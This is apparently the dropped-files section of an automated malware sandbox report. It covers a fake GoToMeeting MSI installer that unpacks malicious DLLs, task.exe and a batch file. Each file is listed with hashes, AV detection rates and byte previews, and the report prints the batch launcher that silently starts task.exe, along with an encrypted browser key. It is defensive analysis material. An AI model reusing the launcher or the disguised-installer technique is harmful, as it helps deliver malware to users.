                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......E.1..._..._..._......._...^..._......._......._......._.Rich.._.........................PE..L.....P.....................|............... ....@.................................-........................................!..P....P...t..........................0 ............................................... ..0............................text...5........................... ..`.rdata....... ......................@..@.data........0......................@....CRT.........@......................@..@.rsrc....t...P...v..................@..@................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\775b62a938f64659aead6abedaf63071$dpx$.tmp\75aedfde5bde214c9f1dda9d9e9a381f.tmp

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Windows\SysWOW64\expand.exe
                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):617472
                                                                                                                                                              Entropy (8bit):6.064860346549003
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:12288:mwyPp3TItEKRC3YtYq0H+J6nEYpaM7Fd5ktc2/ZLvJ6Asu/uDc:mwggE2C3YtYq0eJgEYpaMnF2LvJ9/K
                                                                                                                                                              MD5:FC284EEE599385A7AE9F098D123E983F
                                                                                                                                                              SHA1:ACAA1C92D85AFD92184D49592AED3AEAB6AD2DED
                                                                                                                                                              SHA-256:16414419A8248A4A55C05859C467D1FAFC298694F3F71916261FE2E08EBF4ABD
                                                                                                                                                              SHA-512:C2538A98DE60AEDDB72CB14513ECCE3493F04E94135182AF658D3FC6425AD890560945EFB02C956B11AA10606C95E7CB286E73C0D27E71F2B17D3494506E7123
                                                                                                                                                              Malicious:true
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 29%
                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D\.v*..v*..v*...)..v*.../."v*......v*.k./..v*.k....v*.k.)..v*...+..v*..v+..v*.Z....v*..v*..v*.Z.*..v*.Z.(..v*.Rich.v*.................PE..L...Z=Bf.........."!...'.N...&...............`............................................@.........................p...........d............................P...G..@f..T....................f.......e..@............`...............................text....M.......N.................. ..`.rdata...e...`...f...R..............@..@.data....v.......l..................@....reloc...G...P...H...$..............@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\775b62a938f64659aead6abedaf63071$dpx$.tmp\87377860be1e204a95d069480a67ac12.tmp

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Windows\SysWOW64\expand.exe
                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):615936
                                                                                                                                                              Entropy (8bit):6.064847871237935
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:12288:DMj1AFMhjwaqawEgg+V7yhlFPvqutOVNbdjhLAOENS7ZHMls:Yj1kjaqawEgg+VmhlFnquOrbLAOFZy
                                                                                                                                                              MD5:8522CF224CB875847762353C89D2DCE2
                                                                                                                                                              SHA1:4947EF0A7B3DA4972106A6A97FFF8C03F9DB6799
                                                                                                                                                              SHA-256:3DC24E9A42D9230F4C0DB64BF11B9DF544066C80C49B2AA66CE9A01DDB8C4088
                                                                                                                                                              SHA-512:8933F0ADD139FD10F452AD18BCC400AB288AEBE5BF764DA66EB332B9B97DC56F7AAAB66FD396B0CA1BF3C29A1487255B562A97FDEFFAACC142347A95CD503350
                                                                                                                                                              Malicious:true
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 67%
                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........|.........................r...........;j......;j......;j..........@....i...............i.......i......Rich............PE..L.....If.........."!...'.H...&...............`............................................@.................................`...d............................P...G...f..T....................f......@e..@............`...............................text....G.......H.................. ..`.rdata..>e...`...f...L..............@..@.data....v.......l..................@....reloc...G...P...H..................@..B........................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\775b62a938f64659aead6abedaf63071$dpx$.tmp\bce5c9c7fb0eb5498f5eb0ff4df1bd89.tmp

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Windows\SysWOW64\expand.exe
                                                                                                                                                              File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):70
                                                                                                                                                              Entropy (8bit):4.377806460743142
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:mKDDFARE3BF//I+K9sALX:hmRACaALX
                                                                                                                                                              MD5:F8ABF91D350D39FF1A48934B88624291
                                                                                                                                                              SHA1:88EF29FD18441C628A43925A8B32535D39E07979
                                                                                                                                                              SHA-256:5B4E3E3F739B1AE3CD907A0ABE9D5AAF51455551F69F9DA57E668F749584EFD6
                                                                                                                                                              SHA-512:3C572C7415FBC8EE5F976AC9B6CCE43C901174777C859E9461451676BD5158E940E0BD173D83D980958295CB9DAACC489F0D596D98E93F71CB81D2603F037876
                                                                                                                                                              Malicious:true
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                              Preview:@echo off..setlocal..cd /d "%~dp0"..start /B "" "task.exe"..endlocal..

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\data.bin (copy)

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Windows\SysWOW64\expand.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):759284
                                                                                                                                                              Entropy (8bit):7.999779959160248
                                                                                                                                                              Encrypted:true
                                                                                                                                                              SSDEEP:12288:xHfeUm3mQ6v/drDVCNSVUzIq+0hplKC8yO1//jOwL1FXM8c4Pu0FxXmV1DU30ma8:xH+I1AMKUdC8yW/jOwLX88ctA41rmaQH
                                                                                                                                                              MD5:8D9B3CA29D78CDA545CF0A3131536F17
                                                                                                                                                              SHA1:D823975E67320244F3F02A59E5D29B53E16A828B
                                                                                                                                                              SHA-256:97978EC89A58611CDEEFFC623805C91966BF1D861395082804EFE05302DAF7CD
                                                                                                                                                              SHA-512:287799D662BF3F113AAB8009503AFE7306F489B7FDAD69CEFFB190C9757412E00F6D3EEDF5D5254D90319B27577D9567DC4B67860DC0148E249C042575F4DC0D
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:`......Z.....v0...............~.......r(...V..#.5._.+.....PFvE..EiI.q....VzuWW....XK.R.?.r....y....e..y...K.v/t.`...k~V;LY....B..Q.cL...$.)`I......Yx..>..a..&uL.;.qIV.Av... ......2.^j.Gb....83s..X.m....:h..%8....;....@.P...x..$4..mV{G.....%..M.<..(.k...Z..\.|:.=.x|..#..=..L.d...k...*C....xs}5..Z,.....Z....5...rv_......W..ns...L...f........eD*Ym.7.vF....K.lND...d.......z.CZ...t...J......^c..iX..u...iA..:P.mVX..J.ib./y.U.;.."^...;3.%t..g.Y.g.....T.....&...d..@.\?....c.-}....y...M..6..)._..."....d[.v....).d.w.C5...rg...[p..c.!.Q{...4s..#>.....1d.Xe#.E^E.<h....7......................`-.A.`.{%...3.$..{. ..&7d.)..#u..T..|......).....4gG0..BSM..;&3;......3X.E*Z.}0YG.NSp.7.t..Q.h.7...mxO...Zvs'js.2....;*....G..8....+.}..H.,.K"9b.rB.D.F.%Eh...0...UU.c...m..#...u.9.aS...2. .\5q.?P....h..H.'.e..P.......#`:..%..>9.+...D.[.4U...&.td.......MMX..[.2.......T...3F.}...l.5C...9.y..:;m\:.B..'........T.. 2F.. *.I....q....p..B.++0.e?(.........v.A....w...C.z.

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\g2m.dll (copy)

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Windows\SysWOW64\expand.exe
                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):617472
                                                                                                                                                              Entropy (8bit):6.064860346549003
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:12288:mwyPp3TItEKRC3YtYq0H+J6nEYpaM7Fd5ktc2/ZLvJ6Asu/uDc:mwggE2C3YtYq0eJgEYpaMnF2LvJ9/K
                                                                                                                                                              MD5:FC284EEE599385A7AE9F098D123E983F
                                                                                                                                                              SHA1:ACAA1C92D85AFD92184D49592AED3AEAB6AD2DED
                                                                                                                                                              SHA-256:16414419A8248A4A55C05859C467D1FAFC298694F3F71916261FE2E08EBF4ABD
                                                                                                                                                              SHA-512:C2538A98DE60AEDDB72CB14513ECCE3493F04E94135182AF658D3FC6425AD890560945EFB02C956B11AA10606C95E7CB286E73C0D27E71F2B17D3494506E7123
                                                                                                                                                              Malicious:true
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 29%
                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D\.v*..v*..v*...)..v*.../."v*......v*.k./..v*.k....v*.k.)..v*...+..v*..v+..v*.Z....v*..v*..v*.Z.*..v*.Z.(..v*.Rich.v*.................PE..L...Z=Bf.........."!...'.N...&...............`............................................@.........................p...........d............................P...G..@f..T....................f.......e..@............`...............................text....M.......N.................. ..`.rdata...e...`...f...R..............@..@.data....v.......l..................@....reloc...G...P...H...$..............@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\run.bat (copy)

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Windows\SysWOW64\expand.exe
                                                                                                                                                              File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):70
                                                                                                                                                              Entropy (8bit):4.377806460743142
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:mKDDFARE3BF//I+K9sALX:hmRACaALX
                                                                                                                                                              MD5:F8ABF91D350D39FF1A48934B88624291
                                                                                                                                                              SHA1:88EF29FD18441C628A43925A8B32535D39E07979
                                                                                                                                                              SHA-256:5B4E3E3F739B1AE3CD907A0ABE9D5AAF51455551F69F9DA57E668F749584EFD6
                                                                                                                                                              SHA-512:3C572C7415FBC8EE5F976AC9B6CCE43C901174777C859E9461451676BD5158E940E0BD173D83D980958295CB9DAACC489F0D596D98E93F71CB81D2603F037876
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:@echo off..setlocal..cd /d "%~dp0"..start /B "" "task.exe"..endlocal..

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exe (copy)

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Windows\SysWOW64\expand.exe
                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):40376
                                                                                                                                                              Entropy (8bit):5.902054884820747
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:768:YRQnUhG5bZDOTpkdD82YbQkRFokFWIILPUh:FWObZDOTpk5T6zqAh
                                                                                                                                                              MD5:F1B14F71252DE9AC763DBFBFBFC8C2DC
                                                                                                                                                              SHA1:DCC2DCB26C1649887F1D5AE557A000B5FE34BB98
                                                                                                                                                              SHA-256:796EA1D27ED5825E300C3C9505A87B2445886623235F3E41258DE90BA1604CD5
                                                                                                                                                              SHA-512:636A32FB8A88A542783AA57FE047B6BCA47B2BD23B41B3902671C4E9036C6DBB97576BE27FD2395A988653E6B63714277873E077519B4A06CDC5F63D3C4224E0
                                                                                                                                                              Malicious:true
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......E.1..._..._..._......._...^..._......._......._......._.Rich.._.........................PE..L.....P.....................|............... ....@.................................-........................................!..P....P...t..........................0 ............................................... ..0............................text...5........................... ..`.rdata....... ......................@..@.data........0......................@....CRT.........@......................@..@.rsrc....t...P...v..................@..@................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task22.msi (copy)

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Windows\SysWOW64\expand.exe
                                                                                                                                                              File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: GoToMeeting 5.4.0.1082, Subject: GoToMeeting, Author: Citrix Online, a division of Citrix Systems, Inc., Keywords: Installer, Template: x64;1033, Revision Number: {0477C971-7364-4C60-9D84-EFF0F290A852}, Create Time/Date: Thu Jan 11 14:59:38 2024, Last Saved Time/Date: Thu Jan 11 14:59:38 2024, Number of Pages: 200, Number of Words: 12, Name of Creating Application: MSI Wrapper (11.0.53.0), Security: 2
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1302528
                                                                                                                                                              Entropy (8bit):7.848370630711635
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24576:Ht9cpVDhqHVSY+M+2UC8yJ/ROwLcE8caCO1JgAt+lyp31CC:QpRhXYJ+2/8yJ5OA4COg9lyp31CC
                                                                                                                                                              MD5:6406CCE810C8AAA887CA6B8E004776D2
                                                                                                                                                              SHA1:1698D3D12341F3824E14F4DAE75300EEA9670797
                                                                                                                                                              SHA-256:FBFDE6F43C30F454B07DBD2FDCD83685AE0016227F5489C13CCB510A0CFF00A6
                                                                                                                                                              SHA-512:3CD6F24C1892ABD1B12A02DAC5AB53E2AFE1C68BC366D1DDB26DF1E56312DA7FF5CACA255E78CB61E3FCBBED21CD03FB8909C61302AF4DBCDDA7AD37EAC73FFA
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\your_package_name.dll (copy)

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Windows\SysWOW64\expand.exe
                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):615936
                                                                                                                                                              Entropy (8bit):6.064847871237935
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:12288:DMj1AFMhjwaqawEgg+V7yhlFPvqutOVNbdjhLAOENS7ZHMls:Yj1kjaqawEgg+VmhlFnquOrbLAOFZy
                                                                                                                                                              MD5:8522CF224CB875847762353C89D2DCE2
                                                                                                                                                              SHA1:4947EF0A7B3DA4972106A6A97FFF8C03F9DB6799
                                                                                                                                                              SHA-256:3DC24E9A42D9230F4C0DB64BF11B9DF544066C80C49B2AA66CE9A01DDB8C4088
                                                                                                                                                              SHA-512:8933F0ADD139FD10F452AD18BCC400AB288AEBE5BF764DA66EB332B9B97DC56F7AAAB66FD396B0CA1BF3C29A1487255B562A97FDEFFAACC142347A95CD503350
                                                                                                                                                              Malicious:true
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 67%
                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........|.........................r...........;j......;j......;j..........@....i...............i.......i......Rich............PE..L.....If.........."!...'.H...&...............`............................................@.................................`...d............................P...G...f..T....................f......@e..@............`...............................text....G.......H.................. ..`.rdata..>e...`...f...L..............@..@.data....v.......l..................@....reloc...G...P...H..................@..B........................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\msiwrapper.ini

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1458
                                                                                                                                                              Entropy (8bit):3.6672578438154977
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24:zoEwUodX8DW8XjULX1+GukdrFF4YI9Y4YI9Nyq4YI9v5Ru9:zZwrYaukhFF4YN4Yuv4YN9
                                                                                                                                                              MD5:419617EE7641A991D2B1DD3144248EF7
                                                                                                                                                              SHA1:7C91BB20A4106692332E853E0038D179BEBBE64F
                                                                                                                                                              SHA-256:C017A94813B6243388EAF8D37F93264DE1D50BE77802921289D06ED8630BC346
                                                                                                                                                              SHA-512:37020EB9FCFD2C07DE77DCCCC31DECE61734DC5A705F1C4202AE822B4820C62884269844913925036EF055F4B09D67E6E64B2107721055EF5D98381AED2988F8
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:W.r.a.p.p.e.d.A.p.p.l.i.c.a.t.i.o.n.I.d.=.7.-.Z.i.p.|.B.r.a.v.e.S.o.f.t.w.a.r.e. .B.r.a.v.e.-.B.r.o.w.s.e.r...W.r.a.p.p.e.d.R.e.g.i.s.t.r.a.t.i.o.n.=.H.i.d.d.e.n...I.n.s.t.a.l.l.S.u.c.c.e.s.s.C.o.d.e.s.=.0...E.l.e.v.a.t.i.o.n.M.o.d.e.=.n.e.v.e.r...B.a.s.e.N.a.m.e.=.t.a.s.k...e.x.e...C.a.b.H.a.s.h.=.5.a.f.a.0.0.7.1.f.6.3.b.6.6.2.d.9.3.a.b.3.5.e.8.a.9.a.6.a.4.4.b.8.a.d.4.3.9.c.6.2.1.6.0.3.8.8.6.9.0.e.5.e.5.7.9.3.c.b.2.b.2.d.4...S.e.t.u.p.P.a.r.a.m.e.t.e.r.s.=...W.o.r.k.i.n.g.D.i.r.=...C.u.r.r.e.n.t.D.i.r.=.*.F.I.L.E.S.D.I.R.*...U.I.L.e.v.e.l.=.5...F.o.c.u.s.=.y.e.s...S.e.s.s.i.o.n.D.i.r.=.C.:.\.U.s.e.r.s.\.t.i.n.a.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.M.W.-.7.0.3.9.4.d.6.c.-.f.5.1.f.-.4.7.2.d.-.a.6.f.7.-.9.1.5.6.5.4.c.f.9.b.1.e.\...F.i.l.e.s.D.i.r.=.C.:.\.U.s.e.r.s.\.t.i.n.a.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.M.W.-.7.0.3.9.4.d.6.c.-.f.5.1.f.-.4.7.2.d.-.a.6.f.7.-.9.1.5.6.5.4.c.f.9.b.1.e.\.f.i.l.e.s.\...R.u.n.B.e.f.o.r.e.I.n.s.t.a.l.l.F.i.l.e.=...R.u.n.B.e.f.o.r.e.I.n.s.t.a.l.l.P.a.

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\bhvAED7.tmp

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Users\user\task.exe
                                                                                                                                                              File Type:Extensible storage engine DataBase, version 0x620, checksum 0x53c051b8, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):16252928
                                                                                                                                                              Entropy (8bit):0.9688562385717057
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:6144:IoTz5eo1CKGP5q/XiE9ENP//Xsx0BnNP//Xsx0Bn695nu8eX8e58ekpjX8ev8efS:Ih+NFrVo90FdLhVKsKan19
                                                                                                                                                              MD5:6BD1EDC3FC67AB10B5817EC905A47263
                                                                                                                                                              SHA1:C3C64EDC4B0C1BB8248E038FBBFB283996F40966
                                                                                                                                                              SHA-256:AAFE33B8082214A1EED78AE8F4A32DBF3A232BE4512FEF0EE90A79AF00837C73
                                                                                                                                                              SHA-512:1F74EBAFF67916D79D322B66F521F2302E4AAE24F41A9E7DB5C67F4578A3A32B4DE9DA856EA55871A6276B4713A09FB8D12B1D121F512C03EC937C8C1EA4E472
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:S.Q.... .......4........X.2';...{k.......................k..........{..5....|..h.m............................';...{-.............................................................................................S...........eJ......n........................................................................................................... ............{E..................................................................................................................................................................................................{E.....................................5....|..................AF.;5....|...........................#......h.m.....................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\09084311-6101-4307-8042-692387250400.tmp

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:JSON data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):4198
                                                                                                                                                              Entropy (8bit):5.483165048243419
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:96:0q8NkGS1fuxv6C58rh/cI9URoDotorujBauvqvV2JkCc1aSDS4S4SDSmI4a:/8NBSkaeoDUh9mVikCwR
                                                                                                                                                              MD5:081215CC735B1BD922A04B1FF884AA43
                                                                                                                                                              SHA1:ABA81F23F307A5AB74C2B2C6D94119F06EFC889D
                                                                                                                                                              SHA-256:8920FC9A2BF08C6F350B83D47F9697061D2EFFCEA2604029AF7FDF5F88A05C40
                                                                                                                                                              SHA-512:2DDBB384EC794C59171715A042BCB0A7BE54EF9CE1206FFCF5237318D5F453BF9941866F13BF7D108D9CEDD425F8533BB0D2DB03C0BEBD41DF0758F6D37866BD
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:{"dual_engine":{"ie_to_edge":{"redirection_mode":0}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfrozen":0},"tab_stats":{"frozen_daily":0,"unfrozen_daily":0}},"fre":{"oem_bookmarks_set":true},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAC+iLm2Zr7aQKM/QMbOv3p0EAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAABP3bqCLIIKULZltKi9naM/NsvjHziFuEObTMT1vXQENAAAAAAOgAAAAAIAACAAAABtMxtfCiQ0HI8W/DJehMIUsnPu/LG+d5TdDuLQSLjn5DAAAAC6rCjpeKykHLu1xImseQaYTi3WjJT27iNlfniGO7Co3Jrxmxi3LVrts6ZkzhjRGSVAAAAAHDkHlxhbJAEPhcLOFI09zETSMTMr9eCqhMrME9N2qmM6xEFhdzzUGADkw/sDe37nc9mKZvhc9lVMimzve

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\40467ba0-1653-4c89-85b8-2b44867f47f0.tmp

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:JSON data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):3282
                                                                                                                                                              Entropy (8bit):5.588111273444896
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:96:0q8NkC1fuxv6CeHBauvqvV2JkCc1aSDS4S4SDSmI4a:/8NbkimVikCwR
                                                                                                                                                              MD5:43ED9F7B4B26E986E54D5D067D056CF7
                                                                                                                                                              SHA1:FFA37C0174EA68D6191C05B416E7FEC577E33996
                                                                                                                                                              SHA-256:1242466F0FB5EFE3382DEF81E4A08193F45892FDFAD770B926EAA205A89A4B17
                                                                                                                                                              SHA-512:6917CC8AA0E37D1069294AB81C37F950D64E63F9D6442E1E6BD31BE2E3B13CDBDDB91057A46419EC6B0F07F38987C416CD5711402152435203079E88BF986A77
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:{"dual_engine":{"ie_to_edge":{"redirection_mode":0}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfrozen":0},"tab_stats":{"frozen_daily":0,"unfrozen_daily":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAC+iLm2Zr7aQKM/QMbOv3p0EAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAABP3bqCLIIKULZltKi9naM/NsvjHziFuEObTMT1vXQENAAAAAAOgAAAAAIAACAAAABtMxtfCiQ0HI8W/DJehMIUsnPu/LG+d5TdDuLQSLjn5DAAAAC6rCjpeKykHLu1xImseQaYTi3WjJT27iNlfniGO7Co3Jrxmxi3LVrts6ZkzhjRGSVAAAAAHDkHlxhbJAEPhcLOFI09zETSMTMr9eCqhMrME9N2qmM6xEFhdzzUGADkw/sDe37nc9mKZvhc9lVMimzveK0Jng=="},"policy":{"last_statist

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\BrowserMetrics\BrowserMetrics-673F0B08-1074.pma

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:DIY-Thermocam raw data (Lepton 3.x), scale 0-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 33554432.000000, slope 293373858522878600971173199085568.000000
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):4194304
                                                                                                                                                              Entropy (8bit):0.22190570136812404
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:1536:OmJO+i7tYUiQUkR7iRGaIFfcRGg1DRFFbqyRG4bpYi3zFH:OmA+wtYnQp9LaIFfpg1HFbq7kp1zF
                                                                                                                                                              MD5:96CC566EBCA09C0AAAD45C6727E9AE15
                                                                                                                                                              SHA1:35D6E3649A2AE249FD35D5E93EEFAB7189877190
                                                                                                                                                              SHA-256:6099CEB2BC18E1354BD83A5050960E82B305D7F02B789D3605CC56C00851AB32
                                                                                                                                                              SHA-512:002ACEB0AC836D857FA547F51A47C507AC46BF77F45F869D28FB51820F74B73F4FCE4825C572173C7941037E49D2C05A38FFE0C5A60E99F5BFE1159826E045DD
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:...@..@...@.....C.].....@...................................`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30....q.........117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?.......".axwgwm20,1(.0..8..B.......2.:.M....U....e...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@..............;........................<.w..U..d.y.oK.>.........."....."...2...".*.:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z...h..|?.T@..$...SF@.......Y@.......Y@.......Y@........?........?.................?.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@................Y@.......Y@.......Y@........?........?z............<..8...#...msNurturingAssistanceHomeDependency.....triggered...

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Crashpad\settings.dat

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):280
                                                                                                                                                              Entropy (8bit):1.7743147021878358
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:FiWWltlxVLVH+aQ/XlQTMUaitIdmW89G/:o1jLVH+BXWofuIIW89
                                                                                                                                                              MD5:3EA201AEF287EBF973E1A12BFE5F5C51
                                                                                                                                                              SHA1:EAFB1D1BE3560ABF539E145CF6DF2C399964D605
                                                                                                                                                              SHA-256:C075F48214230427DBA7B750D520BED4C1AF506FA5E6F1A90D741F3F9FFCFCB3
                                                                                                                                                              SHA-512:8351348611B1148B3C7FD742FD6C706BDCA10C1E7F0D35DD03D48DAA883E82682B48D56E23B09DDACAC27A8BEDC90E0679183E0106C90B3064D967952BCA6561
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:sdPC.....................!....B...)....................................................................................................................................................................................................1d6028a1-60eb-480a-a77a-a923f6a0f623............

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Crashpad\throttle_store.dat

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:ASCII text
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):20
                                                                                                                                                              Entropy (8bit):3.6219280948873624
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:8g6Vvn:8g6Vv
                                                                                                                                                              MD5:9E4E94633B73F4A7680240A0FFD6CD2C
                                                                                                                                                              SHA1:E68E02453CE22736169A56FDB59043D33668368F
